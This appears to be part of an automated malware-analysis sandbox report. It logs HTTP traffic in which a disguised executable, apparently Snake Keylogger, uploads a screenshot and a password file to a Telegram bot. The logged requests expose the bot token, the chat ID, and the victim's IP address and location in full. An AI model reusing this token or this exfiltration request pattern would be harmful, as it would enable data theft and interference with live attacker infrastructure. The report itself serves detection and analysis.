                                              2024-09-26 09:34:50 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 61 31 61 38 65 33 34 66 64 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dcea1a8e34fdebContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:50 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:34:50 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:50 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:34:50 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:50 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:34:50 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:50 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:34:50 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:50 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:52 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:52 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              53192.168.2.1049782149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:52 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dceb41e16a8b57
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:52 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 62 34 31 65 31 36 61 38 62 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dceb41e16a8b57Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:53 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:53 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:53 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 39 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6365,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343293,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              54192.168.2.1049783149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:54 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dcecf5324ccbef
                                              Host: api.telegram.org
                                              Content-Length: 673762
                                              2024-09-26 09:34:54 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 63 66 35 33 32 34 63 63 62 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dcecf5324ccbefContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:54 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:34:54 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:54 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:34:54 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:54 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
